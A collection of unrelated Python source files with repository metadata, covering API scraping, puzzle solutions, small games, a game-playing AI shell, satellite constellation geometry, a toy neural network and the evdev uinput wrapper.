9da780ec5ea8c12d33231cb1c439d007cf1bbe12 | Python | ahillard/Python-Web-Scrapers | /open_states_api.py | UTF-8 | 2,733 | 2.8125 | 3 | [] | no_license | # import json, requests
#####################################################
###Problem 1
#####################################################
###Use the following documentation to identify url
###https://sunlightlabs.github.io/openstates-api/legislators.html#examples/legislator-detail
# url = 'http://openstates.org/api/v1/legislators/?state=mo&active=true'
# r = requests.get(url)
# legislators = json.loads(r.content)
# full_names = [record['full_name'] for record in legislators]
# print full_names
#####################################################
###Problem 2
#####################################################
###Use the followig documentation to identify url for problem 2
###https://sunlightlabs.github.io/openstates-api/bills.html#bill-fields
# url = 'http://openstates.org/api/v1/bills/?state=mo&chamber=upper&search_window=session'
# r = requests.get(url)
# bills_introduced = json.loads(r.content)
# print bills_introduced
###Or, if you only want to print the id...
# bill_id = [record['bill_id'] for record in bills_introduced]
# print bill_id
#####################################################
###Problem 3
#####################################################
# subjects_bills_introduced = [record['subjects'] for record in bills_introduced]
# ###There are no subjects for the bills listed in Problem 2
# ###Modified search to include bills from both house and senate as lower chamber appears to record subject
# url = 'http://openstates.org/api/v1/bills/?state=mo&search_window=session&subject=Health'
# r = requests.get(url)
# bills_introduced_subject = json.loads(r.content)
# print bills_introduced_subject
# ###Or, if you only want to print the id...
# bill_id = [record['bill_id'] for record in bills_introduced_subject]
# print bill_id
#####################################################
###Problem 4
#####################################################
import json, requests
# Problem 4: list every current-session MO bill tagged "Health" together
# with the last action taken on it.  Python 2 script; needs the
# third-party `requests` package and the (now retired) Open States v1 API.
url = 'http://openstates.org/api/v1/bills/?state=mo&search_window=session&subject=Health'
r = requests.get(url)
bills_introduced_subject = json.loads(r.content)
title = [record['title'] for record in bills_introduced_subject]
bill_id = [record['bill_id'] for record in bills_introduced_subject]
last_action = []
# One extra API round-trip per bill to pull its action history.
for x in bill_id:
    url = 'http://openstates.org/api/v1/bills/mo/2016/' + x + '/'
    r = requests.get(url)
    bill_details = json.loads(r.content)
    bill_actions = bill_details['actions']
    # assumes 'actions' is non-empty and chronologically ordered -- TODO confirm
    last_action.append(bill_actions[len(bill_actions)-1]['action'])
id_action = zip(bill_id, last_action)
###Or, if you want title, change bill_id to title in above code
print 'Id and Last Action Taken for Bills Related to Health'
for x in id_action:
    print x[0] + ' ' + x[1]
| true |
a9cfaa7cd2d5776e8406cb3b7d511b6735838ea0 | Python | RinaKorca/simpleRestAPI | /helper.py | UTF-8 | 186 | 2.6875 | 3 | [] | no_license | import string
import random
def generateUniqueID(chars=string.ascii_lowercase + string.digits, madhesia=12):
    """Return a random identifier of ``madhesia`` characters drawn from ``chars``.

    Note: despite the name, the result is random rather than guaranteed
    unique -- callers must tolerate the (unlikely) collision.  ``random`` is
    not cryptographically secure; switch to the ``secrets`` module if these
    IDs ever act as access tokens.
    """
    return ''.join(random.choices(chars, k=madhesia))
149defe1978b3c7378e70118cd063db4c5e2e845 | Python | wang264/JiuZhangLintcode | /Algorithm/L3/require/140_fast-power.py | UTF-8 | 697 | 3.75 | 4 | [] | no_license | # 140. Fast Power
# 中文English
# Calculate the a^n % b where a, b and n are all 32bit non-negative integers.
#
# Example
# For 2^31 % 3 = 2
#
# For 100^1000 % 1000 = 0
#
# Challenge
# O(logn)
class Solution:
    """
    @param a: A 32bit integer
    @param b: A 32bit integer
    @param n: A 32bit integer
    @return: An integer
    """
    def fastPower(self, a, b, n):
        """Compute a^n mod b in O(log n) by iterative binary exponentiation.

        ``n`` is assumed non-negative (as the problem statement guarantees).
        """
        result = 1 % b       # covers n == 0, including the b == 1 case
        base = a % b
        exponent = n
        while exponent > 0:
            if exponent & 1:            # current bit set: multiply it in
                result = (result * base) % b
            base = (base * base) % b    # square for the next bit
            exponent >>= 1
        return result
a7a3a910821fd42e9ed1c322dec8673052a8ed9f | Python | maeckie/adventofcode_2018 | /day_4/main.py | UTF-8 | 1,861 | 2.921875 | 3 | [] | no_license | #!/usr/bin/python
import re
import collections
import datetime
import time
# Parse the AoC 2018 day-4 log into a dict keyed by the "[...]" timestamp
# string, valued by the rest of the line.  Timestamps sort lexicographically
# into chronological order, which break_down_guard_sleep relies on.
# NOTE(review): the hard-coded absolute path only works on the author's
# machine, and the name `input` shadows the builtin.
with open('/Users/marcus/Documents/advent/adventofcode_2018/day_4/gute_input.txt') as file:
    input = file.readlines()
input = map(lambda x: x.replace('\n', ''), input)
d = {}
for line in input:
    m = re.match('\[(.*)\](.*)', line)
    d[m.group(1)] = m.group(2)
def break_down_guard_sleep():
    """Replay the module-level log ``d`` in timestamp order.

    Returns a dict mapping guard id (str) to
    ``{'total': minutes asleep, 'all_mins': [every minute spent asleep]}``.
    Relies on three line shapes: "Guard #N begins shift", "...falls asleep"
    and anything else meaning "wakes up".
    """
    all_guards = {}
    guard = 0
    for key in sorted(d):
        if 'Guard' in d[key]:
            guard = re.search('Guard #(\d+) begins shift', d[key]).group(1)
            if guard not in all_guards:
                all_guards[guard] = {'total':0, 'all_mins': []}
        elif 'sleep' in d[key]:
            # Only the minute component matters: sleeps happen in hour 00.
            start_sleep = int(key.split(':')[1])
        else:
            stop_sleep = int(key.split(':')[1])
            mins = stop_sleep - start_sleep
            all_guards[guard]['total'] += mins
            #start_min = int(str(start_sleep).split(':')[1])
            # Record every individual asleep minute for the frequency parts.
            all_guards[guard]['all_mins'].extend(range(start_sleep,mins+start_sleep))
    return all_guards
def part1():
    """AoC day 4 part 1: pick the guard asleep the most minutes overall and
    print guard_id * the minute that guard is most often asleep."""
    all_guards = break_down_guard_sleep()
    find_max = ''
    for itm in all_guards:
        if find_max == '':
            find_max = itm  # first guard seen seeds the running maximum
        elif all_guards[itm]['total'] > all_guards[find_max]['total']:
            find_max = itm
    print int(find_max) * max(set(all_guards[find_max]['all_mins']), key=all_guards[find_max]['all_mins'].count)
def part2():
    """AoC day 4 part 2: find the (guard, minute) pair with the highest
    single-minute sleep frequency and print guard_id * minute."""
    all_guards = break_down_guard_sleep()
    find_max = 0
    g = 0
    minute = 0
    for guard in all_guards:
        mins = collections.Counter(all_guards[guard]['all_mins'])
        # most_common() is sorted descending, so only the first entry can
        # beat the running maximum; the loop breaks after inspecting it.
        for m in mins.most_common():
            if m[1] > find_max:
                minute = m[0]
                find_max = m[1]
                g = guard
            break
    print int(g) * int(minute)
part1()
part2()
| true |
828b64b67c8ddd8ce7211153a5328357f747da4c | Python | J-woooo/acmicpc | /13458.py | UTF-8 | 576 | 2.9375 | 3 | [] | no_license | import sys
# BOJ 13458 "exam supervision": one chief supervisor (capacity b) per room,
# plus enough assistants (capacity c each) for the remaining students.
input = sys.stdin.readline
n = int(input())
studentList = list(map(int, input().split(" ")))
b, c = map(int, input().split(" "))
result = n  # every room needs exactly one chief supervisor
# for i in range(n):
#     studentList[i] -= b
#     if studentList[i] <= 0:
#         continue
#     elif not studentList[i] == 0:
#         if studentList[i] % c == 0:
#             result += (studentList[i] // c)
#         else:
#             result += (studentList[i] // c) + 1
for num in studentList:
    num -= b  # chief covers the first b students of the room
    if num <= 0:
        continue
    # ceil(num / c) assistants for whoever is left
    result += num // c if num % c == 0 else num // c + 1
print(result)
0189dbae6c8b991f80b15d9c36962bddd718e451 | Python | siggame/MegaMinerAI-12 | /shellAI/python/AI.py | UTF-8 | 4,946 | 2.890625 | 3 | [] | no_license | #-*-python-*-
from BaseAI import BaseAI
from GameObject import *
class AI(BaseAI):
  """The class implementing gameplay logic.

  MegaMinerAI shell AI: every turn it spawns workers on owned tiles when
  oxygen allows, marches every owned unit toward the enemy side, attacks
  adjacent enemies, and digs the tile below when possible.
  """
  WORKER, SCOUT, TANK = range(3)
  @staticmethod
  def username():
    return "Shell AI"
  @staticmethod
  def password():
    return "password"
  ##This function is called once, before your first turn
  def init(self):
    pass
  ##This function is called once, after your last turn
  def end(self):
    pass
  ##This function is called each time it is your turn
  ##Return true to end your turn, return false to ask the server for updated information
  def run(self):
    """Execute one full turn: spawn, move, attack, dig.  Always returns 1."""
    numberOfUnits = 0
    #get the number of units owned
    for u in self.units:
      #if I own this unit increase the count
      if u.owner == self.playerID:
        numberOfUnits += 1
    #look for my tiles
    for tile in self.tiles:
      #if this tile is my spawn tile or my pump station
      if tile.owner == self.playerID:
        #get the unit cost for a worker
        cost = 0
        for u in self.unitTypes:
          if u.type == self.WORKER:
            cost = u.cost
        #if there is enough oxygen to spawn the unit
        if self.players[self.playerID].oxygen >= cost:
          #if can spawn more units in
          if numberOfUnits < self.maxUnits:
            #if nothing is spawning on the tile
            if tile.isSpawning == 0:
              canSpawn = True
              #if it is a pump station and it's not being sieged
              if tile.pumpID != -1:
                #find the pump in the vector
                for pump in self.pumpStations:
                  if pump.id == tile.pumpID and pump.siegeAmount > 0:
                    canSpawn = False
              #if there is someone else on the tile, don't spawn
              for other in self.units:
                if tile.x == other.x and tile.y == other.y:
                  canSpawn = False
              if canSpawn:
                #spawn the unit
                tile.spawn(self.WORKER)
                numberOfUnits += 1
    # Player 0 advances right, player 1 advances left.
    moveDelta = 0
    if self.playerID == 0:
      moveDelta = 1
    else:
      moveDelta = -1
    #do stuff for each unit
    for unit in self.units:
      #if you own the unit
      if unit.owner != self.playerID:
        continue
      #try to move to the right or left movement times
      for i in range(unit.maxMovement):
        canMove = True
        #if there is no unit there
        for others in self.units:
          if unit.x + moveDelta == others.x and unit.y == others.y:
            canMove = False
        #if nothing's there and it's not moving off the edge of the map
        if canMove and (0 <= unit.x + moveDelta < self.mapWidth):
          # Tiles are stored column-major: index = x * mapHeight + y.
          #if the tile is not an enemy spawn point
          if (not (self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].pumpID == -1 and \
              self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].owner == 1 - self.playerID)) or \
              self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].owner == 2:
            #if the tile is not an ice tile
            if not (self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].owner == 3 and
                self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].waterAmount > 0):
              #if the tile is not spawning anything
              if self.tiles[(unit.x + moveDelta) * self.mapHeight + unit.y].isSpawning == 0:
                #if the unit is alive
                if unit.healthLeft > 0:
                  #move the unit
                  unit.move(unit.x + moveDelta, unit.y)
      #if there is an enemy in the movement direction and the unit hasn't
      #attacked and it is alive
      if unit.hasAttacked == 0 and unit.healthLeft > 0:
        for other in self.units:
          #check if there is an enemy unit in the direction
          if unit.x + moveDelta == other.x and \
             unit.y == other.y and other.owner != self.playerID:
            #attack it
            unit.attack(other)
            break
      #if there is a space to dig below the unit and the unit hasn't dug
      #and the unit is alive
      if unit.y != self.mapHeight - 1 and \
         self.tiles[unit.x * self.mapHeight + unit.y + 1].pumpID == -1 and \
         self.tiles[unit.x * self.mapHeight + unit.y + 1].owner == 2 and \
         unit.hasDug == False and unit.healthLeft > 0:
        canDig = True
        #make sure there is no unit on that tile
        for other in self.units:
          if unit.x == other.x and unit.y + 1 == other.y:
            canDig = False
        #make sure the tile is not an ice tile
        if(canDig and \
           not (self.tiles[unit.x * self.mapHeight + unit.y + 1].owner == 3 and \
                self.tiles[unit.x * self.mapHeight + unit.y + 1].waterAmount > 0)):
          unit.dig(self.tiles[unit.x * self.mapHeight + unit.y + 1])
    return 1
  def __init__(self, conn):
    """Forward the server connection to the BaseAI constructor."""
    BaseAI.__init__(self, conn)
| true |
dec9a01489aee3050c681c08e6bf358b654d51a3 | Python | paulo-romano/attributetools | /attributetools.py | UTF-8 | 340 | 2.953125 | 3 | [
"MIT"
] | permissive | # coding: utf-8
def set_attributes(func, **dict_attributes):
    """Attach every keyword argument to ``func`` as an attribute, in place.

    The original called the dunder ``func.__setattr__`` and looked each key
    up twice; the builtin ``setattr`` with ``.items()`` is the idiomatic
    equivalent.
    """
    for key, value in dict_attributes.items():
        setattr(func, key, value)
class attribute():
    """Decorator that attaches the given keyword arguments to the target.

    Example::

        @attribute(tag="x")
        def f(): ...
        # now f.tag == "x"
    """
    def __init__(self, **attributes):
        # Remember the attributes until the decorator is applied.
        self.attributes = attributes

    def __call__(self, func):
        # Copy every stored attribute onto the decorated callable.
        for name, value in self.attributes.items():
            setattr(func, name, value)
        return func
| true |
39d7904a21a3366c5bf4242389c3df1859502e83 | Python | nickligen/Python-100-Days | /Day01-15/Day05/practice/guess.py | UTF-8 | 387 | 4.1875 | 4 | [] | no_license | import random
# Number-guessing game: pick a secret in [1, 100] and prompt until the
# player finds it, counting the attempts.
answer = random.randint(1,100)
count = 0
while True:
    count=count+1
    number=int(input('Guess a number:'))
    if number>answer:
        # the guess is bigger than the secret
        print('Bigger than answer')
    elif number<answer:
        print('Smaller than answer')
    else:
        print('You are correct!')
        break
print('The answer is ' +str(number))
print('You tried ' + str(count) + ' times')
| true |
d5228e24ed51b467aea45ec66bdef0b59d72d1b6 | Python | chiaolun/console-2048 | /console2048.py | UTF-8 | 2,010 | 3.0625 | 3 | [] | no_license | from __future__ import print_function
import os
import sys
from model import Game
# Python 2/3 compatibility.
# Rebind the py3 names to their py2 equivalents so the rest of the file can
# use range/input unconditionally.
if sys.version_info[0] == 2:
    range = xrange
    input = raw_input
def _getch_windows(prompt):
    """
    Windows specific version of getch. Special keys like arrows actually post
    two key events. If you want to use these keys you can create a dictionary
    and return the result of looking up the appropriate second key within the
    if block.
    """
    print(prompt, end="")
    key = msvcrt.getch()
    # 224 is the prefix byte announcing an extended (special) key.
    if ord(key) == 224:
        key = msvcrt.getch()
        # NOTE(review): this path returns the raw second byte *undecoded*
        # and skips the echo below, unlike the normal path -- confirm intended.
        return key
    print(key.decode())
    return key.decode()
def _getch_linux(prompt):
    """Linux specific version of getch.

    Reads one raw keypress (no Enter, no echo) and returns it as ``str``.
    Bug fix: the previous version returned ``bytes`` from ``os.read``, which
    makes ``main``'s membership test against the ``str`` keypad raise
    TypeError on Python 3; decoding here keeps the return type consistent
    with ``_getch_windows``'s normal path.
    """
    print(prompt, end="")
    sys.stdout.flush()
    fd = sys.stdin.fileno()
    old = termios.tcgetattr(fd)
    new = termios.tcgetattr(fd)
    # Raw-ish mode: disable line buffering (ICANON) and echo.
    new[3] = new[3] & ~termios.ICANON & ~termios.ECHO
    new[6][termios.VMIN] = 1   # block until at least one byte arrives
    new[6][termios.VTIME] = 0  # no inter-byte timeout
    termios.tcsetattr(fd, termios.TCSANOW, new)
    char = None
    try:
        char = os.read(fd, 1).decode()
    finally:
        # Always restore the terminal settings, even if the read fails.
        termios.tcsetattr(fd, termios.TCSAFLUSH, old)
    print(char)
    return char
# Set version of getch to use based on operating system.
# The backend module (msvcrt or termios) is imported lazily here so the
# platform that lacks it never tries to load it.
if sys.platform[:3] == 'win':
    import msvcrt
    getch = _getch_windows
else:
    import termios
    getch = _getch_linux
def main():
    """
    Get user input.
    Update game state.
    Display updates to user.

    Board dimensions may be passed on the command line; 'q' quits,
    w/a/s/d move.
    """
    keypad = "adws"
    game = Game(*map(int, sys.argv[1:]))
    game.display()
    while True:
        # NOTE(review): on Linux (and the Windows special-key path) getch
        # returns bytes while keypad is str, so `get_input in keypad` raises
        # TypeError on Python 3 -- decode at the getch boundary.
        get_input = getch("Enter direction (w/a/s/d): ")
        if get_input in keypad:
            # keypad index doubles as the direction code for Game.move.
            game.move(keypad.index(get_input))
        elif get_input == "q":
            break
        else:
            print("\nInvalid choice.")
            continue
        if game.end:
            game.display()
            print("You Lose!")
            break
        game.display()
    print("Thanks for playing.")
main()
| true |
cbbe43c5ee643ada18c8919b8475cf43c47c9c4f | Python | galactics/beyond | /beyond/utils/constellation.py | UTF-8 | 3,106 | 3.515625 | 4 | [
"MIT"
] | permissive | """Utilities to compute the parameters of a constellation.
At the moment, only the Walker Star and Walker Delta are available
(see `wikipedia <https://en.wikipedia.org/wiki/Satellite_constellation#Walker_Constellation>`__)
"""
import numpy as np
class WalkerStar:
    """Walker Star constellation geometry.

    Example: Iridium is a Walker Star 66/6/2 constellation, created with
    ``WalkerStar(66, 6, 2)``.
    """

    def __init__(self, total, planes, spacing, raan0=0):
        """
        Args:
            total (int) : Total number of satellites
            planes (int) : Number of planes
            spacing (int) : relative spacing between satellites of adjacent planes
            raan0 (float) : RAAN of the first plane (in radians)

        The argument order follows the Walker notation total/planes/spacing.
        """
        self.total = total
        self.planes = planes
        self.spacing = spacing
        self.raan0 = raan0

    def __repr__(self):  # pragma: cover
        return f"<{self.__class__.__name__} {self.total}/{self.planes}/{self.spacing}>"

    @property
    def per_plane(self):
        """Number of satellites on each orbital plane"""
        return self.total // self.planes

    def raan(self, i_plane):
        """
        Args:
            i_plane (int) : index of the plane
        Return:
            float : Right Ascension of Ascending Node in radians

        Star pattern: the planes share the 0..pi half-circle.
        """
        return np.pi / self.planes * i_plane + self.raan0

    def nu(self, i_plane, i_sat):
        """
        Args:
            i_plane (int) : index of the plane
            i_sat (int) : index of the satellite
        Return:
            float : True anomaly in radians
        """
        return (
            2 * np.pi / self.per_plane * i_sat
            + self.spacing * 2 * (self.raan(i_plane) - self.raan0) / self.per_plane
        )

    def iter_raan(self):
        """Yield the RAAN of every plane, in plane order."""
        yield from (self.raan(p) for p in range(self.planes))

    def iter_nu(self, plane):
        """Yield the true anomaly of every satellite of ``plane``."""
        yield from (self.nu(plane, s) for s in range(self.per_plane))

    def iter_fleet(self):
        """Yield a ``(raan, nu)`` pair for every satellite of the fleet."""
        for plane, raan in enumerate(self.iter_raan()):
            yield from ((raan, nu) for nu in self.iter_nu(plane))
class WalkerDelta(WalkerStar):
    """Definition of the Walker Delta constellation

    Example: Galileo is a Walker Delta 24/3/1 constellation
    so to generate this, one has to call ``WalkerDelta(24, 3, 1)``

    Differs from WalkerStar in two ways: the planes are spread over the
    full circle (2*pi) instead of a half-circle, and the inter-plane
    phasing term drops WalkerStar's extra factor of 2.
    """
    def raan(self, i_plane):
        """
        Args:
            i_plane (int) : index of the plane
        Return:
            float : Right Ascension of Ascending Node in radians
        """
        return 2 * np.pi / self.planes * i_plane + self.raan0
    def nu(self, i_plane, i_sat):
        """
        Args:
            i_plane (int) : index of the plane
            i_sat (int) : index of the satellite
        Return:
            float : True anomaly in radians
        """
        return (
            2 * np.pi / self.per_plane * i_sat
            + self.spacing * (self.raan(i_plane) - self.raan0) / self.per_plane
        )
| true |
d8553b937959804b40119f9a41ee59185af03770 | Python | RonohP/AI | /Neural_Network/ANN ML.py | UTF-8 | 3,820 | 3.671875 | 4 | [] | no_license | import numpy
# import random
# import os
# learning rate
# learning rate
# NOTE(review): 1 is a very aggressive rate for plain gradient descent --
# confirm it is intentional.
lr = 1
# weights
# weights[w1j, w1i, w2j, w2i, w3j, w3i, Wjk, Wik]
weights = [0.2, 0.1, 0.3, 0.1, 0.2, 0.1, 0.5, 0.1]
# maximum and minimum values of the data provided
# (used for min-max normalisation of inputs and target in back())
max_value = 70
min_value = 15
# a,b and c are inputs
# d is output
# a,b and c are inputs
# d is output
def back(a, b, c, d):
    """One backpropagation step on a 3-input / 2-hidden / 1-output net.

    Inputs a, b, c and target d are min-max normalised with the
    module-level min_value/max_value, pushed through the sigmoid network,
    and the global ``weights`` list is updated in place.
    """
    # Min-max normalise everything into [0, 1].
    input1 = ((a - min_value) / (max_value - min_value))
    input2 = ((b - min_value) / (max_value - min_value))
    input3 = ((c - min_value) / (max_value - min_value))
    output = ((d - min_value) / (max_value - min_value))
    # input into node j
    j = (input1 * weights[0]) + (input2 * weights[2]) + (input3 * weights[4])
    output_j = 1 / (1 + numpy.exp(-j))  # sigmoid function
    # input into node i
    i = (input1 * weights[1]) + (input2 * weights[3]) + (input3 * weights[5])
    output_i = 1 / (1 + numpy.exp(-i))  # sigmoid function
    # input of k
    k = (output_j * weights[6]) + (output_i * weights[7])
    # output from k
    output_k = 1 / (1 + numpy.exp(-k))
    # NOTE(review): weights are only updated when the normalised target is
    # exactly 0 (i.e. d == min_value); for every other sample this call is
    # a no-op -- confirm this is intended.
    if output > 0:
        pass
    else:
        # error value at node k
        error = (output - output_k) * output_k * (1 - output_k)
        # errors for the hidden layers
        error_j = error * weights[6] * output_j * (1 - output_j)
        error_i = error * weights[7] * output_i * (1 - output_i)
        hidden_layer = numpy.array([error_j, error_i])
        print('Updated hidden layers matrix:', hidden_layer)
        # delta weight updates
        # updated weights connected to j
        # NOTE(review): all three deltas use output_j (resp. output_i)
        # rather than the corresponding input activations -- verify
        # against the intended update rule.
        weights[0] += lr * error * output_j
        weights[2] += lr * error * output_j
        weights[4] += lr * error * output_j
        # print('Updated weights connected to J weights(w1j, w2j, w3j):(', weights[0], weights[2], weights[4], ')')
        # updated weights connected to i
        weights[1] += lr * error * output_i
        weights[3] += lr * error * output_i
        weights[5] += lr * error * output_i
        # print('Updated weights connected to I weights(w1i, w2i, w3i):(', weights[1], weights[3], weights[5], ')')
        weight = numpy.array([[weights[0], weights[2], weights[4]],
                              [weights[1], weights[3], weights[5]]])
        print('Updated Outer Layer Weight Matrix:\n', weight)
def main():
    """Train on the hard-coded samples, then run one interactive
    forward pass on user-supplied x, y, z values."""
    # a loop for repeating every situation several times
    # learning stage
    for i in range(1):
        back(30, 40, 50, 20)  # Epoch1
        back(40, 50, 20, 15)  # Epoch2
        back(50, 20, 15, 60)  # Epoch3
        back(20, 15, 60, 70)  # Epoch4
        back(15, 60, 70, 50)  # Epoch5
        back(60, 70, 50, 40)  # Epoch6
    # enter values prompt
    print('Enter x: ')
    x = int(input())
    print('Enter y: ')
    y = int(input())
    print('Enter z')
    z = int(input())
    # convert the data entered to a value between o and 1
    # new value = ((original value - minimum value) / (maximum value - minimum value))
    input1 = ((x - min_value) / (max_value - min_value))
    input2 = ((y - min_value) / (max_value - min_value))
    input3 = ((z - min_value) / (max_value - min_value))
    # print('\n x is ', input1, '\n y is', input2, '\n z is', input3)
    # input into node j
    j = (input1 * weights[0]) + (input2 * weights[2]) + (input3 * weights[4])
    # input into node i
    i = (input1 * weights[1]) + (input2 * weights[3]) + (input3 * weights[5])
    # print('\n input into node j', j, '\n input into node i', i)
    output_j = 1 / (1 + numpy.exp(-j))  # sigmoid function
    output_i = 1 / (1 + numpy.exp(-i))  # sigmoid function
    # print('\n output from j', output_j, '\n output from i', output_i)
    # input of k
    k = (output_j * weights[6]) + (output_i * weights[7])
    # output from k
    # Final network prediction (normalised to [0, 1]).
    output_k = 1 / (1 + numpy.exp(-k))
    print('\n output from k', output_k)
# Script entry point: train on the hard-coded epochs, then run one
# interactive prediction.
if __name__ == '__main__':
    main()
| true |
8bad661b1a6ffb4facb6ee6322eb219f7857cfcd | Python | victorgevaerd/app-prime-numbers-bridge-2021.1 | /server/src/settings.py | UTF-8 | 751 | 3.109375 | 3 | [] | no_license | import sys
from os import getenv
from dotenv import load_dotenv
load_dotenv()
# Validate required environment variables and expose PORT (int) and
# DEBUG (bool) as module-level settings.
with_error = False

if getenv('PORT') is None:
    print('Variável "PORT" não definida!. Defina no arquivo servidor/.env')
    print('Exemplo: PORT=3000')
    with_error = True

if getenv('DEBUG') is None:
    print('Variável "DEBUG" não definida!. Defina no arquivo servidor/.env')
    print('Exemplo: DEBUG=True')
    with_error = True

if with_error:
    raise SystemExit('Variáveis de ambiente não definidas!')

try:
    PORT = int(getenv('PORT'))
except ValueError:
    raise SystemExit('Variável PORTA deve ser um número natural!')

# BUG FIX: bool() on any non-empty string is True (bool("False") is True)
# and never raises ValueError, so the old conversion accepted anything and
# its except branch was dead code.  Parse the usual boolean spellings
# explicitly instead.
_debug_raw = getenv('DEBUG').strip().lower()
if _debug_raw in ('true', '1', 'yes', 'on'):
    DEBUG = True
elif _debug_raw in ('false', '0', 'no', 'off'):
    DEBUG = False
else:
    raise SystemExit('Variável DEBUG deve ser do tipo boolean!')
| true |
5a49c4ec635f091da212d6d51f0e9d88e5ef5115 | Python | sea-lab-wm/burt | /crashscope/lib/python-scripts/evdev/uinput.py | UTF-8 | 6,979 | 2.625 | 3 | [
"Apache-2.0"
] | permissive | # encoding: utf-8
import os
import stat
import time
from evdev import _uinput
from evdev import ecodes, util, device
class UInputError(Exception):
    """Raised for uinput setup/usage problems (missing or invalid device
    node, over-long device name, reading capabilities before open)."""
    pass
class UInput(object):
    '''
    A userland input device that can inject input events into the
    linux input subsystem.
    '''

    __slots__ = (
        'name', 'vendor', 'product', 'version', 'bustype',
        'events', 'devnode', 'fd', 'device',
    )

    def __init__(self,
                 events=None,
                 name='py-evdev-uinput',
                 vendor=0x1, product=0x1, version=0x1, bustype=0x3,
                 devnode='/dev/uinput'):
        '''
        :param events: the event types and codes that the uinput
                       device will be able to inject - defaults to all
                       key codes.
        :type events: dictionary of event types mapping to lists of
                      event codes.
        :param name: the name of the input device.
        :param vendor: vendor identifier.
        :param product: product identifier.
        :param version: version identifier.
        :param bustype: bustype identifier.

        .. note:: If you do not specify any events, the uinput device
                  will be able to inject only ``KEY_*`` and ``BTN_*``
                  event codes.
        '''
        self.name = name         #: Uinput device name.
        self.vendor = vendor     #: Device vendor identifier.
        self.product = product   #: Device product identifier.
        self.version = version   #: Device version identifier.
        self.bustype = bustype   #: Device bustype - eg. ``BUS_USB``.
        self.devnode = devnode   #: Uinput device node - eg. ``/dev/uinput/``.

        if not events:
            events = {ecodes.EV_KEY: ecodes.keys.keys()}

        # the min, max, fuzz and flat values for the absolute axis for
        # a given code
        absinfo = []

        self._verify()

        #: Write-only, non-blocking file descriptor to the uinput device node.
        self.fd = _uinput.open(devnode)

        # set device capabilities
        for etype, codes in events.items():
            for code in codes:
                # handle max, min, fuzz, flat
                if isinstance(code, (tuple, list, device.AbsInfo)):
                    # flatten (ABS_Y, (0, 255, 0, 0)) to (ABS_Y, 0, 255, 0, 0)
                    f = [code[0]]; f += code[1]
                    absinfo.append(f)
                    code = code[0]

                #:todo: a lot of unnecessary packing/unpacking
                _uinput.enable(self.fd, etype, code)

        # create uinput device
        _uinput.create(self.fd, name, vendor, product, version, bustype, absinfo)

        #: An :class:`InputDevice <evdev.device.InputDevice>` instance
        #: for the fake input device. ``None`` if the device cannot be
        #: opened for reading and writing.
        self.device = self._find_device()

    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        # hasattr guard: __init__ may have failed before fd was assigned.
        if hasattr(self, 'fd'):
            self.close()

    def __repr__(self):
        # :todo:
        v = (repr(getattr(self, i)) for i in
             ('name', 'bustype', 'vendor', 'product', 'version'))
        return '{}({})'.format(self.__class__.__name__, ', '.join(v))

    def __str__(self):
        msg = ('name "{}", bus "{}", vendor "{:04x}", product "{:04x}", version "{:04x}"\n'
               'event types: {}')

        evtypes = [i[0] for i in self.capabilities(True).keys()]
        msg = msg.format(self.name, ecodes.BUS[self.bustype],
                         self.vendor, self.product,
                         self.version, ' '.join(evtypes))

        return msg

    def close(self):
        # close the associated InputDevice, if it was previously opened
        if self.device is not None:
            self.device.close()

        # destroy the uinput device
        if self.fd > -1:
            _uinput.close(self.fd)
            self.fd = -1

    def write_event(self, event):
        '''
        Inject an input event into the input subsystem. Events are
        queued until a synchronization event is received.

        :param event: InputEvent instance or an object with an
                      ``event`` attribute (:class:`KeyEvent
                      <evdev.events.KeyEvent>`, :class:`RelEvent
                      <evdev.events.RelEvent>` etc).

        Example::

            ev = InputEvent(1334414993, 274296, ecodes.EV_KEY, ecodes.KEY_A, 1)
            ui.write_event(ev)
        '''
        if hasattr(event, 'event'):
            event = event.event

        self.write(event.type, event.code, event.value)

    def write(self, etype, code, value):
        '''
        Inject an input event into the input subsystem. Events are
        queued until a synchronization event is received.

        :param etype: event type (eg. ``EV_KEY``).
        :param code: event code (eg. ``KEY_A``).
        :param value: event value (eg. 0 1 2 - depends on event type).

        Example::

            ui.write(e.EV_KEY, e.KEY_A, 1) # key A - down
            ui.write(e.EV_KEY, e.KEY_A, 0) # key A - up
        '''
        _uinput.write(self.fd, etype, code, value)

    def syn(self):
        '''
        Inject a ``SYN_REPORT`` event into the input subsystem. Events
        queued by :func:`write()` will be fired. If possible, events
        will be merged into an 'atomic' event.
        '''
        _uinput.write(self.fd, ecodes.EV_SYN, ecodes.SYN_REPORT, 0)

    def capabilities(self, verbose=False, absinfo=True):
        '''See :func:`capabilities <evdev.device.InputDevice.capabilities>`.'''
        if self.device is None:
            raise UInputError('input device not opened - cannot read capabilites')

        return self.device.capabilities(verbose, absinfo)

    def _verify(self):
        '''
        Verify that an uinput device exists and is readable and writable
        by the current process.
        '''
        try:
            m = os.stat(self.devnode)[stat.ST_MODE]
            if not stat.S_ISCHR(m):
                # BUG FIX: a bare ``raise`` with no active exception raises
                # RuntimeError, which the except clause below does not
                # catch.  Raise an OSError so the friendly UInputError is
                # produced instead.
                raise OSError('{} is not a character device'.format(self.devnode))
        except (IndexError, OSError):
            msg = '"{}" does not exist or is not a character device file '\
                  '- verify that the uinput module is loaded'
            raise UInputError(msg.format(self.devnode))

        if not os.access(self.devnode, os.W_OK):
            msg = '"{}" cannot be opened for writing'
            raise UInputError(msg.format(self.devnode))

        if len(self.name) > _uinput.maxnamelen:
            msg = 'uinput device name must not be longer than {} characters'
            raise UInputError(msg.format(_uinput.maxnamelen))

    def _find_device(self):
        #:bug: the device node might not be immediately available
        time.sleep(0.1)

        # Scan /dev/input/ for the device whose name matches ours;
        # returns None implicitly when it is not found.
        for fn in util.list_devices('/dev/input/'):
            d = device.InputDevice(fn)
            if d.name == self.name:
                return d
| true |
9e1da42e7295e4cace5186d8b8bbf852a7aff1d6 | Python | AnatolyDomrachev/karantin | /is28/paranina28/lab3/pr3.py | UTF-8 | 92 | 3.734375 | 4 | [] | no_license | x = int(input("номер дня в годy "))
# Map the day-of-year number in x onto a 1..7 weekday index:
# multiples of 7 map to 7, everything else to x mod 7.
x = x % 7
print(x if x else 7)
